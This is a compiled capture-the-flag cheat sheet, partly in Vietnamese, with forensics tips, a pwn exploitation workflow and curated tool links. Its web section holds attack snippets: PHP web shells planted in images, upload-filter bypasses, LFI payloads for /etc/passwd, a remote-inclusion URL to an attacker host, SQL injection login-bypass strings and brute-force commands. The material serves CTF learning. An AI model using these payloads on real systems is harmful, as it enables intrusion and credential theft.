# FORENSICS * Pict check: - hex value: - First thing first, check the signature hex of format file. - jpg file: find first FF C0 byte and skip 3 byte is the height's byte of the picture. - png file: after the signature byte of png then skip 4 bytes of IHDR and 2 byte of width to see 2 height bytes - secret file: - binwalk -e: to extract hidden file from picture - steghide extract -sF: just for specially case that use stenography tools to hide files * Online tools - https://jwt.io/#debugger-io - https://gchq.github.io/CyberChef - https://www.dcode.fr/identifier - https://www.cmd5.org - https://hexed.it/ - https://www.debuggex.com/ - http://xor.pw/ - https://passwordrecovery.io/zip-file-password-removal/ # Quy trình pwn 1. Phân Loại Dạng Bài Pwnable Các bài pwnable thường thuộc một trong các nhóm chính sau: Loại bài Dấu hiệu nhận biết Kỹ thuật khai thác chính Buffer Overflow Input quá dài, lỗi tràn bộ đệm, có gets(), strcpy() Stack Overflow, Ret2libc, ROP Format String printf(user_input) mà không có %s, %x, %n Leak địa chỉ, ghi đè GOT/PLT Heap Exploitation Chương trình dùng malloc(), free(), lỗi double free Fastbin Attack, UAF, House of * ROP (Return Oriented Programming) Không thể thực thi shellcode trực tiếp (NX bảo vệ bật) Ret2libc, ROP chain GOT Hijacking Có bảng GOT nhưng không bật Full RELRO Ghi đè GOT entry để chuyển hướng thực thi Privilege Escalation Chương trình chạy dưới user bình thường nhưng có setuid(0); Leo thang đặc quyền, LFI, Race Condition Kernel Exploitation Có module kernel hoặc chạy trên môi trường root Exploit kernel, stack overflow kernel 👉 Bài dễ thường có dấu hiệu sau: Không bật nhiều cơ chế bảo vệ (NX, PIE, RELRO). Có sử dụng gets(), strcpy(), scanf("%s") (Dễ bị Buffer Overflow). In ra địa chỉ cần thiết (puts() có thể giúp leak địa chỉ libc). Không có canary (__stack_chk_fail không xuất hiện trong binary). Có chức năng system("/bin/sh") hoặc các hàm tiện lợi khác. 2. Kiểm Tra Bảo Vệ của Binary Trước khi khai thác, cần kiểm tra xem chương trình có bật các cơ chế bảo vệ nào: 2.1 Kiểm tra với checksec Chạy lệnh sau để xem các cơ chế bảo vệ của binary: bash Copy Edit checksec --file=chall Kết quả có thể bao gồm: NX (No eXecute bit): Nếu OFF, có thể chèn shellcode. PIE (Position Independent Executable): Nếu OFF, địa chỉ của binary cố định. RELRO (Relocation Read-Only): Nếu Partial, có thể ghi đè GOT. Canary: Nếu OFF, có thể khai thác buffer overflow dễ hơn. 2.2 Xem thông tin với file bash Copy Edit file chall Kiểm tra xem binary là 32-bit hay 64-bit vì điều này ảnh hưởng đến cách khai thác. 3. Phân Tích Chương Trình Có thể dùng Ghidra, IDA Pro, Radare2, hoặc objdump để phân tích mã nguồn. 3.1 Xác định chức năng chính bash Copy Edit strings chall # Xem các chuỗi ký tự trong binary nm -C chall # Liệt kê các symbol và function trong binary objdump -d chall # Dissassemble binary Tìm các hàm nguy hiểm như: system() gets(), scanf(), strcpy() printf(user_input) 3.2 Xác định đầu vào của chương trình Chạy thử chương trình: bash Copy Edit ./chall Dùng ltrace để theo dõi các lời gọi hàm: bash Copy Edit ltrace ./chall Dùng gdb để debug: bash Copy Edit gdb -q ./chall 4. Lập Kế Hoạch Khai Thác Dựa trên phân tích ở trên, xác định cách khai thác: Dạng lỗi Cách khai thác Buffer Overflow (Stack) Ghi đè EIP/RIP để kiểm soát luồng thực thi Format String Leak địa chỉ libc, ghi đè GOT Heap Exploitation Fastbin Attack, House of * ROP (Return Oriented Programming) Tạo chuỗi ROP để gọi system("/bin/sh") 5. Viết Exploit Dùng Pwntools để viết script khai thác: python Copy Edit from pwn import * # Kết nối đến chương trình p = process("./chall") # Payload gây tràn bộ nhớ payload = b"A" * 40 + p64(0xdeadbeef) # Gửi payload p.sendline(payload) # Mở shell p.interactive() 6. Debug và Hoàn Thiện Exploit Nếu chưa thành công, debug với GDB: bash Copy Edit gdb -q ./chall Dùng các lệnh quan trọng: disas main → Disassemble hàm main() info functions → Liệt kê các hàm b *main+30 → Đặt breakpoint run → Chạy chương trình x/20gx $rsp → Xem stack 7. Kiểm Tra và Nộp Flag Sau khi khai thác thành công, có thể tìm được flag bằng cách: bash Copy Edit cat flag.txt Hoặc nếu trên server CTF: python Copy Edit p = remote("server_ip", 1337) p.sendline(payload) p.interactive() Tổng Kết 🔹 Bước 1: Xác định dạng bài pwnable (Stack, Heap, Format String, ROP, Kernel). 🔹 Bước 2: Kiểm tra cơ chế bảo vệ với checksec. 🔹 Bước 3: Phân tích binary bằng Ghidra, IDA Pro, hoặc objdump. 🔹 Bước 4: Xác định lỗi và lập kế hoạch khai thác. 🔹 Bước 5: Viết script khai thác với Pwntools. 🔹 Bước 6: Debug với GDB nếu cần. 🔹 Bước 7: Khai thác thành công, lấy flag! 🚀 . . . . . . . . . # CTF Tools This repository is a place where I want to keep all the useful *resources/websites/tools* to solve CTF challenges. All the tools will be divided by category, in order to have a better organization. This repo is for me but also for my CTF team, and why not for whoever will get to this page. It will contain even some "obvious" links, like the ASCII table and so on, because it is a page indended to be kept open during CTFs: you never know what will come in handy! ## Training 🚩 > A list of useful websites to train our skills and knowledge. - [picoCTF](https://picoctf.org/) - [capturetheflag](https://capturetheflag.it/risorse/come-imparo) - [overthewire](https://overthewire.org/wargames/) - [pwnable](http://pwnable.kr/) ## General 📋 #### Tools - [John Hammond - Katana](https://github.com/JohnHammond/ctf-katana): **huge repo of very useful CTF tools**, thank you John, my repo now looks useless - [Cyberchef](https://gchq.github.io/CyberChef/): huge tool to perform **every type of calculation of any category** - [Hex Editor](https://hexed.it/): online **hex editor** for files - [Online Converter](https://www.rapidtables.com/convert/number/ascii-hex-bin-dec-converter.html): **ASCII/Hex/Dec/Bin/b64 converter** tool online - [XOR Calculator](http://xor.pw/) - [Resource Saver](https://chrome.google.com/webstore/detail/save-all-resources/abpdnfjocnmdomablahdcfnoggeeiedb?hl=en-US): Chrome extension to **download all the res of a website** - [Github Secrets](https://github.com/neodyme-labs/github-secrets): search for **dangling or force-pushed commits** in a Github repo - [Zip Password Cracker](https://passwordrecovery.io/zip-file-password-removal/): a realy useful and free **online zip password finder** - [Regex Check](https://www.debuggex.com/): check **regular expressions** online #### Resources - [ASCII Table](http://www.asciitable.com/) ## Cryptography 🔒 #### Tools - [dCode](https://www.dcode.fr): **crypto heaven** - [QuipQuip](https://quipqiup.com/): online **substitution cipher solver** with frequency analysis, also allows to insert frequency hints - [Big Numbers Calculator 1](http://www.javascripter.net/math/calculators/100digitbigintcalculator.htm): an online **calculator for huge integers** - [Big Numbers Calculator 2](https://defuse.ca/big-number-calculator.htm): an online **calculator for huge integers**, worse UI but maybe better performance - [RSA Calculator](https://www.cryptool.org/en/cto/highlights/rsa-step-by-step): online **RSA parameters calculator with encryption/decryption**, works also with big numbers - [Inverse mod N Calculator](https://www.dcode.fr/modular-inverse): compute the **modular inverse of a number**, even with big numbers - [RsaCtfTool](https://github.com/Ganapati/RsaCtfTool): Python tool to perform **RSA attacks** - [FactorDB](http://factordb.com/): find **well-known integer factorization** - [CrackStation](https://crackstation.net/): online **hash cracker** (md5, sha, ...) - [Vigenere Solver](https://www.guballa.de/vigenere-solver): very good online **Vigenere Cipher solver** with bruteforce - [Substitution Solver](https://www.guballa.de/substitution-solver): very good online **Substitution Cipher solver** with bruteforce - [Sage Math](https://sagecell.sagemath.org/): online Sage environment to **perform Crypto calculations** - [Crunch](https://tools.kali.org/password-attacks/crunch): Linux tool to **create custom dictionaries** for attacks (hash, pd, ..) - [Online Hash Crack](https://www.onlinehashcrack.com/): big website to **perform hash/pwd cracking and identification** on various files - [Hash Identifier](https://tools.kali.org/password-attacks/hash-identifier): Linux tool to **perform hash identification** - [Morse Code Translator](https://morsecode.world/international/translator.html) - [Dual Tone Decoder](http://dialabc.com/sound/detect/): find **DTMF tones** within audio clips - [gmpy2](https://gmpy2.readthedocs.io/en/latest/intro.html): Python library for **multiple-precision arithmetic** #### Resources - [Weird Ciphers](http://www.quadibloc.com/crypto/intro.htm): a list of some **strange cryptography algorithms** - [Symbolic Ciphers](https://www.dcode.fr/symbols-ciphers): another list of **strange cryptography algorithms** ## Steganography 🎨 #### Tools - [Aperi'Solve](https://aperisolve.fr/): **one of the best online tools**, with static analysis and also running zsteg, steghide, exiftool, binwalk, foremost, .. - [StegOnline](https://stegonline.georgeom.net): big stego tool, upload image and **modify/extract data** - [Stegsolve](https://github.com/eugenekolo/sec-tools/tree/master/stego/stegsolve/stegsolve): JAR file to view **hidden text in images** - [Steg 1](https://stylesuxx.github.io/steganography/): online **encoder/decoder of files in images** - [Steg 2](https://futureboy.us/stegano/decinput.html): online **encoder/decoder of files in images**, maybe more powerful - [Images Color picker](https://imagecolorpicker.com/): get **colors from websites/images in Hex/RGB** - [Stegseek](https://github.com/RickdeJager/stegseek): lightning fast **steghide cracker** that can be used to extract hidden data from files. #### Resources - [steghide](http://steghide.sourceforge.net/documentation/manpage.php): manual website of the **Steghide** tool - [zsteg](https://github.com/zed-0xff/zsteg): Ruby tool for steganography purposes ## Web 🕸️ #### Tools - [CSP Evaluator](https://csp-evaluator.withgoogle.com/): Google **CSP evaluator** with bypass possibilities - [Subdomain Finder](https://subdomainfinder.c99.nl/index.php): website to **find subdomains of URLs**, even hidden ones - [Google Certificates](https://transparencyreport.google.com/https/certificates): search certificates of a website by domain - [Traversal Archives](https://github.com/jwilk/traversal-archives): samples of archive files in various formats that attempt to exploit (hypothetical) directory travesal bugs #### Resources - [CSP Cheatsheet](https://six2dez.gitbook.io/pentest-book/enumeration/web/csp): list of **CSPs and relative bypass** possibilities - [JSONP Endpoints](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt): list of **well-known JSONP Endpoints** - [Web Payloads](https://github.com/swisskyrepo/PayloadsAllTheThings): list of **Web Payloads** of various techniques ## Pwn 🐛 ### Tools - [Syscall Reference](https://syscalls.w3challs.com/): **x86 / x64 syscalls manual** with registers value - [Asm/Disasm](https://defuse.ca/online-x86-assembler.htm#disassembly): online **x86 / x64 assembler and disassembler** - [LibC Check](https://libc.blukat.me/?q=puts%3A0x7f51bf2ee9c0&l=libc6_2.27-3ubuntu1_amd64): find all the **possible libc versions** with symbol name and entry address - [BinaryNinja](https://cloud.binary.ninja/): online **binary file decompiler** - [DogBolt](https://dogbolt.org/): online **binary file decompiler** with different options like Ghidra and BinaryNinja ### Resources ## Forensics 🕵️‍♂️ ### Tools - [Forensically](https://29a.ch/photo-forensics/#forensic-magnifier): **online forensic analysis tool** to extract cool data from images, .. - [Autopsy](https://www.sleuthkit.org/autopsy/): **file recovery tool** with data carving, .. - [Foremost](https://tools.kali.org/forensics/foremost): **file recovery tool** based on their magic bytes, headers, .. ### Resources ## OSINT 🌐 - [Mail from LinkedIn](https://skrapp.io/tutorials/linkedin-email-finder): Chrome extension to **find email addresses from Linkedin page** - [Wayback Machine](https://archive.org/web/): **webpage archive at a certain time** - [Sherlock](https://github.com/sherlock-project/sherlock): hunt down **social media accounts by username** - [Email lookup](https://epieos.com/): tool to **retrieve information linked to an email address** ## Reversing ↩️ ### Tools - [Online Decompiler](http://www.javadecompilers.com/): online tool to decompile **Java classes, APKs,...** - [MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF): tool to **decompile and reverse APK** files - [JADX](https://github.com/skylot/jadx): tools for producing Java source code from **Android Dex and APK** files - NB: strings is useful also on APK files # ANOTHER TIPS ## Operating System Useful OS To master in CTF, you should familiar using Linux OS. Linux been so good in cyber security field. There is a lot of CTF tools pre-installed in Linux. My suggestion is to start playing with Kali Linux. Kali Linux is Advanced Penetration Testing Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments. For me, I used both Kali Linux and Windows because some tools are easier to play in windows environment and some not. Using VirtualBox will ease your work better than running dual boot. But note here, virtual machine may heavy and high memory for low specs laptop/machine. Suggested virtual machines: Kali Linux - Linux-based penetration testing OS Flare-VM - Windows-based malware analysis lab Commando-VM - Windows-based offensive security lab Nitjutsu-OS - Windows-based offensive security lab ## Basic Basic things beginner need to master When CTF organizer give you a binary (download file), always run command file [filename] on the binary. File command will determine what type of file are you've downloaded. They will check the magic number or file signature in the binary header. Learn more about file signature at here. Some of challenge's creator will confuse you up when they change or remove the extension of a binary. Example, the actual binary is binary.jpg but they changed it to binary.exe. So, the ctf player will thought that it's a executable file instead of image/jpeg file. Run strings -a [filename] to extracts strings in the given binary. Some clues or artifacts can be found in the strings output. Base64 is the common encoding used in CTF. Learn about it's characteristics and how to decode it. Some online tools that can help you is this site. But, the better approach is to decode encoded strings using Linux's terminal. It's because some base64 encoded may a binary file. So, if it's a binary file, online tool like in the link can't provide the decoded binary file. It only can decode strings but not binary file. Example of Linux command for base64 is like this echo "[strings of the base64]" | base64 -d. Learn about number encoding. Hexadecimal, binary, decimal and also ASCII. You can use this website to convert your strings to each other. ## Cryptography Scrumbled and encrypted text Whatever happen, google is your friend. There are a lot cryptography tools online. Some of good tool are made offline like OpenSSL. Classic cipher / Simple decoder online tool https://quipqiup.com - quipqiup is a fast and automated cryptogram solver https://www.base64decode.org/ - base64 decoder https://www.urldecoder.org/ - URL decoder https://emn178.github.io/online-tools/base32_decode.html - Base32 decoder https://cryptii.com/ - All in one tool https://www.guballa.de/substitution-solver - Substitution solver https://www.guballa.de/vigenere-solver - Vigenere solver https://rot13.com/ - Rot 1 - 25 decryptor https://www.dcode.fr - All in one tool http://rumkin.com/tools/cipher/ - All in one tool http://www.unit-conversion.info/texttools/morse-code/ - Morse code decoder https://cryptii.com/pipes/ascii85-encoding - ASCII85 decoder https://github.com/Ciphey/Ciphey -Ciphey Modern cryptography https://gchq.github.io/CyberChef/ - All in one tool https://crackstation.net/ - Crack hash Cryptool John the Ripper Hashcat OpenSSL cheatsheet Decrypt a file using RSA private key openssl rsautl -decrypt -inkey pub_priv.key -in ciphertext.file -out decrypted.file Decrypt a file using AES-256-CBC and a keyfile openssl enc -d -aes-256-cbc -in ciphertext.file -out cleartext.file -pass file:./key.file Decrypt a file using AES-256-CBC openssl enc -aes-256-cbc -d -in file.txt.enc -out file.txt Decrypt a file using AES-256-CBC with base64 encoded openssl enc -aes-256-cbc -d -a -in file.txt.enc -out file.txt Others reference https://gist.github.com/dreikanter/c7e85598664901afae03fedff308736b#file-encrypt_openssl-md Cracking compressed file John the Ripper - john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt fcrackzip - fcrackzip -D -u -p rockyou.txt filename.zip Note: Sometimes there are some challenges that require you to develop your own decryptor for that particular challenge. Just make sure you have a good scripting/programming language to solve the challenges. ## Steganography A method to hiding something in something. General Usually when organizer gave us Image, Music, Video, Zip, EXE, File System, PDF and other files, it a steganography or forensics challenge. Run file command first. Metadata is important. Checkout the EXIF data of the file by using exiftool [filename] command. Try issuing binwalk [filename] on the file. They may hide another file in the file. To extract, use binwalk -e. To extract one specific signature type, use binwalk -D 'png image:png' [filename]. To extract all files, run binwalk --dd='.*' [filename]. Try file carve using foremost -v [filename] command. Foremost support all files. Images View the image first Use strings command to that file. Try grep -i [any strings you want to filter] from the strings command output. Example grep -i "flag{" to filtering the flag format only. -i option to unable case sensitive. Google the images, differentiate the md5hash. If you found same image but have a different md5 hash, it may probably have been altered. Analyse the header and the content of the file using any hex editor. Know the file signature. Maybe they gave us corrupt header! So fix it! Maybe zoom-in and zoom-out method can get the flag. Use https://www.tineye.com/ to reverse search the image in the internet. Use imagemagick command tool to do image manipulation. Use Stegsolve.jar tools. There are so many CTF I've participated that I used this tool to unhide flag from an image. File carve using steghide --extract -sf <filename>. Try find the password with your own-self. Maybe, the organizer will give hints or the password may in another file. Check for any corruption on PNG file by using pngcheck <filename.png> command. Detect stegano-hidden data in PNG & BMP s by issuing zsteg -a <filename.png>. Use SmartDeblur software to fix blurry on image. Use stegcracker <filename> <wordlist> tools Steganography brute-force password utility to uncover hidden data inside files. Use tesseract to scan text in image and convert it to .txt file. Another powerfool tool is called zsteg. Steganosuite Extract data from image (-x) Some of online stegano decoder :- https://futureboy.us/stegano/decinput.html http://stylesuxx.github.io/steganography/ https://www.mobilefish.com/services/steganography/steganography.php https://manytools.org/hacker-tools/steganography-encode-text-into-image/ https://steganosaur.us/dissertation/tools/image https://georgeom.net/StegOnline http://magiceye.ecksdee.co.uk/ Compressed file Unzip it. Use zipdetails -v command to display details about the internal structure of a Zip file. Use zipinfo command to know details info about Zip file. Use zip -FF input.zip --out output.zip attempt to repair a corrupted zip file. Brute-force the zip password using fcrackzip -D -u -p rockyou.txt filename.zip To crack 7z run 7z2hashcat32-1.3.exe filename.7z. Then john --wordlist=/usr/share/wordlists/rockyou.txt hash Music file Use binwalk first. They may embedded something in the file. Use Audacity. Use Sonic Visualizer. Look at spectogram and other few Pane. Use Deepsound. Use SilentEye. Some of online stegano decoder for music:- https://steganosaur.us/dissertation/tools/audio Text Use http://www.spammimic.com/ that can decode hide message in spam text. PDF qpdf PDFStreamdumper pdfinfo pdfcrack pdfimages pdfdetach pdf-parser.py -v <file> pdftotext peepdf -if <filename> object <value> pdfid ## Digital Forensics Usually organizer will gave us a Digital Image like memory dump like .raw or image file like .e01 and few others more. Always issuing file <filename> command to whatever file you get first! If the result of the file command is only "data", you must try harder to find the right tool to carve information that contain in the file. Checkout the EXIF data of the file by using exiftool <filename> command. Run strings for clues. Try file carve using foremost <filename> command. Foremost support all files. But it takes time to extract all file when you face a big size file. Common locations for various artifacts :- Web: browsing history, cookies, cache files and others. Windows OS: registry table, event logs and others. Linux: configuration files, log files and others. Mobile phones: app data and others. Many more! Tools :- Volatility. Its a memory extraction utility framework for memory forensic. Use this as your Volatility command reference. Redline. Another alternative to volatility. But Volatility is the best for me. Bulk-extractor software. It can extracts features such as email addresses, credit card numbers, URLs, and other types of information from digital evidence files. FTK Imager. FTK Imager is a data preview and imaging tool that allows you to examine files and folders on local hard drives, network drives, CDs/DVDs, and review the content of forensic images or memory dumps. Use Autopsy, ProDiscover or EnCase software, function as FTK Imager. Use e2fsck [mnt image] to fix corrupt filesystem. ext3 and 4. Recover files using Recuva. They may gave you an image that you can mount to your machine using FTK Imager. So, go to the drive and try recover the files you want. RegRipper for registry analysis Mastering Windows event viewer will give you a plus. Useful Tools for scanning event log DeepblueCLI Chainsaw WELA HayaBusa APTHunter ## Reverse Engineering An art of code analysis to analyse the inner working codes. Note: This challenge is quite hard for beginner. This checklist is not fully cover all things in RE and it will not applicable if you don't have the foundation to play with reverse engineering. Whenever you get a file, issuing file command first to it to know what really file is it. Use strings <filename> command to read the strings in the binary to find some clues. Maybe some grep -i command too. You need to strong in C, Assembly Language and computer architecture for this challenge! Most of CTF reversing require scripting if it involve with encryption etc. It may can be solve using Debugger. Usually they gave a binary file. Weather it a... PE File (.exe or .dll) ELF File (elf) APK File (apk) .NET File (exe) Java file Python File (pyc or py) PE File Use DIE, PEID, PEBear, or PEView software to do static file analysis. Find details of file in there! Use HxD to check the header file, file signature. Maybe the corrupt file sign one. Find it whether it packed or not. Find online unpack. Find it whether the binary has anti-debug or not. Use IDA Pro software to perform static analysis on the binary. When do analysis static or dynamic focus on strcmp, function call, conditional jump. You can use Snowman or Ghidra software to perform decompiler. Use debugger like Immunity Debugger, x64Dbg/x32Dbg, or WinDbg to debug the binary. API monitor Frida-trace ELF Use ltrace ./<filename> command to know what library function are being called in the binary. Use strace ./<filename> command to know what system and signal function are being called in the binary. Use nm <filename> command to know what symbol being called in the binary. Use readelf -a <filename> command. It will displays information about ELF files. Use Gdb debugger extension. Peda, pwndbg or gef will help you!. Or you can use edb debugger. Use IDA Pro software to perform static analysis on the binary. APK File Use APKTool <filename> command tools. Use Android Emulator to run the program. Use Android Debug Bridge. Use dex2jar <filename> command tools. Use jd-gui. JADX is good alternative to jd-gui. Rename the file to zip file. Unzip it. Take a look the file in your favorite text editor. .Net File Use dnSpy software. Very powerful. You can compile the program by Edit in the main interface -> compile -> save all. Try run the program back! Java file Use JADX Python file There are many options, one of it is uncompyle6. Just google dor python decompiler. https://github.com/extremecoders-re/pyinstxtractor - Python EXE to pyc Shellcode scdbg shellcode2exe pdfstreamdumper shellcode analysis debugger IDA Pro unicode2hex-escaped hxd Others https://www.decompiler.com/ EXE or DLL (C#), JAR or CLASS, APK, XAPK or DEX, PYC or PYO, LUAC or LUB, SMX or AMXX ## Binary Exploit / Pwn Exploit program vulnerability Note : Usually they gave us a binary and a source code of the binary. Whenever you get a file, issuing file command first to it to know what really file is it. You need strong in Assembly Language, computer architecture, C programming (Reverse engineering) and Python language to make script for this challenge! Run checksec check the properties of executable of binary security. Stack Canaries = a secret value placed on the stack which changes every time the program is started. the stack canary is checked and if it appears to be modified, the program exits immeadiately. Nx = stored input or data cannot be executed as code Address Space Layout Randomization (ASLR) = The randomization of the place in memory where the program, shared libraries, the stack, and the heap are. RELRO = makes binary sections read-only. Tools : Pwntool framework Gdb debugger. Peda, pwndbg or gef. Use readelf -a <filename> command. It will displays information about ELF files. Use nm <filename> command to know what symbol being called in the binary. Python Some tips from expert. Function that can lead to bof scanf read strcat fread fgets sprintf strcpy gets memcpy memmove strncpy snprintf strncat ## Web Web attack Enumeration Check it out web browser What does it display Read entire pages look for emails, names, user info - Enum the interface, what version of CMS, server installation page etc. - What does the potential vulnerability in it? LFI, RFI, Directory traversal, SQL Injection, XML External Entities, OS Command Injection, Upload vulnerability Default web server page which reveals version information? Use Web Application Scanner (Refer note) Example, nikto nikto -h 10.10.10.10 –output filename Google for exploit Rapid7 SearchSploit If https scan for heartbleed sslscan 192.168.101.1:443 nmap -sV --script=ssl-heartbleed 192.168.3.157 Read the certificate Does it include names that might be useful? - Correct vhost View the source code Hidden Values Developer Remarks Extraneous Code Passwords! Use curl curl <ip address / dns> View robots.txt Brute forcing HTTP(s) directories and files Tools dirb dirbuster nikto wfuzz gobuster for quick directory search Brute force directory recursively If you found a directory example /admin, bruteforce more deeply dirb http://10.10.10.1/admin/ Looking for .git Set extension sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar Bruteforce subdomain xxx.google.com Creating wordlist from webpage cewl Redirecting webpage automatically? noredirect plugin If it's a login page Try view source code Use default password Brute force directory first (sometime you don't need to login to pwn the machine) using curl bruteforce credential Burpsuite sniper. clusterbomb Wfuzz wfuzz -w pass.txt -L 20 -d "username=FUZZ&password=FUZZ" -hw 1224 http://login page path Search credential in other service port tftp ftp Enumeration for the credential Search credential by bruteforce directory Register first SQL injection SQLMap XSS can be used to get the admin cookie Bruteforce session cookie If it's a CMS Google their vulnerability Wordpress, Drupal, Joomla. Vtiger, etc. Go to admin page Joomla /administrator Wordpress /wp-admin /wp-login Wordpress wpscan -u 192.168.3.145 --enumerate -t --enumerate u --enumerate p Bruteforce login page wpscan –u ipaddress --username name --wordlist pathtolist Random agent wpscan -u http://cybear32c.lab/ --random-agent Zoom.py enumerate wordpress users Drupal droopsescan https://github.com/droope/droopescan /CHANGELOG.txt to find version Adobe Cold Fusion Metasploit - Determine version /CFIDE/adminapi/base.cfc?wsdl Version 8 Vulnerabilit Fckeditor use exploit/windows/http/coldfusion_fckeditor LFI http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en Elastix Google the vulnerabitlities default login are admin:admin at /vtigercrm/ able to upload shell in profile-photo Examine configuration files - Generic Examine httpd.conf/ windows config files JBoss JMX Console http://IP:8080/jmxconcole/ War File Joomla configuration.php diagnostics.php joomla.inc.php config.inc.php Mambo configuration.php config.inc.php Wordpress setup-config.php wp-config.php ZyXel /WAN.html (contains PPPoE ISP password) /WLAN_General.html and /WLAN.html (contains WEP key) /rpDyDNS.html (contains DDNS credentials /Firewall_DefPolicy.html (Firewall) /CF_Keyword.html (Content Filter) /RemMagWWW.html (Remote MGMT) /rpSysAdmin.html (System) /LAN_IP.html (LAN) /NAT_General.html (NAT) /ViewLog.html (Logs) /rpFWUpload.html (Tools /DiagGeneral.html (Diagnostic) /RemMagSNMP.html (SNMP Passwords) /LAN_ClientList.html (Current DHCP Leases) Config Backups /RestoreCfg.html /BackupCfg.html Upload page Upload shell to make reverse shell Bypass file upload filtering Rename it upload it as shell.php.jpg Blacklisting bypass, change extension php phtml, .php, .php3, .php4, .php5, and .inc bypassed by uploading an unpopular php extensions. such as: pht, phpt, phtml, php3, php4, php5, php6 asp asp, .aspx perl .pl, .pm, .cgi, .lib jsp .jsp, .jspx, .jsw, .jsv, and .jspf Coldfusion .cfm, .cfml, .cfc, .dbm Whitelisting bypass passed by uploading a file with some type of tricks, Like adding a null byte injection like ( shell.php%00.gif ). Or by using double extensions for the uploaded file like ( shell.jpg.php) GIF89a; If they check the content. Basically you just add the text "GIF89a;" before you shell-code. <? system($_GET['cmd']);//or you can insert your complete shellcode ?> In image manipulate data exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' lo.jpg rename it mv lo.jpg lo.php.jpg Phpmyadmin Default password root:pma Webmin Have vulnerabilities, google. Identify WAF using wafw00f Spidering a given URL, up to a specified depth, and returns a list of words which can then be used for password crackers WMAP Web Scanner web application vulnerability scanner Exploitation Heartbleed exploit Copy use auxiliary/scanner/ssl/openssl_heartbleed set RHOSTS 192.168.3.212 set verbose true run XXS Session hijacking / Cookie theft. Steal cookie to get admin privilege use xsser tool Local File Inclusion Bypassing php-execution http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index Bypassing the added .php and other extra file-endings http://example.com/page=../../../../../../etc/passwd%00 http://example.com/page=../../../../../../etc/passwd? folder that always exist /etc/hosts /etc/resolv.conf add %00jpg to end of files /etc/passwd%00jpg Refer this for more information https://sushant747.gitbooks.io/total-oscp-guide/local_file_inclusion.html https://highon.coffee/blog/lfi-cheat-sheet/ Remote file inclusion http://exampe.com/index.php?page=http://attackerserver.com/evil.txt SQL Injection Enum using nmap nmap -sV --script=http-sql-injection <target> Using jsql Using sqlmap with login-page Capture the request using burp suite, and save the request in a file. sqlmap -r request.txt Crawl a page to find sql-injections sqlmap -u http://example.com --crawl=1 http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet Login bypass ‘or 1=1- - ‘ or ‘1’=1 ‘ or ‘1’=1 - - ‘– ' or '1'='1 -' ' ' '&' '^' '*' ' or ''-' ' or '' ' ' or ''&' `' or ''^'`` `' or ''*' "-" " " "&" "^" "*" " or ""-" " or "" " " or ""&" " or ""^" " or ""*" or true-- " or true-- ' or true-- ") or true-- ') or true-- ' or 'x'='x ') or ('x')=('x ')) or (('x'))=(('x " or "x"="x ") or ("x")=("x ")) or (("x"))=(("x known Username admin’ - - admin’) - - Using error-bases DB enumeration Add the tick ' Enumerate columns Using order by https://sushant747.gitbooks.io/total-oscp-guide/sql-injections.html XML External Entity (XXE) URL vulnerability OS command Injection Directory traversal Dotdotpwn tool ## PCAP analysis Tools Wireshark NetworkMiner Strings Tshark Checklist Understand the packets Export objects Protocol hierarchy give you general understanding Follow TCP streams Filtering Search for keyword such as "flag" using Find Packet Take a look at Info column. Stupid challenge always put the flag letter by letter in different packets. If challenge about wifi, USB or keyboard thingy, google the past writeup how they solve. Others Convert pcapng to pcap tshark -F pcap -r file.pcapng -w newfile.pcap Bruteforce WEP password for PCAP aircrack-ng -b XX:XX:XX:XX:89:b3 -w ../rockyou.txt target.pcap Go to Edit > preference > Protocol > IEEE 802.11 > Edit... button > wpa-pwd password USB pcap https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes Reference https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection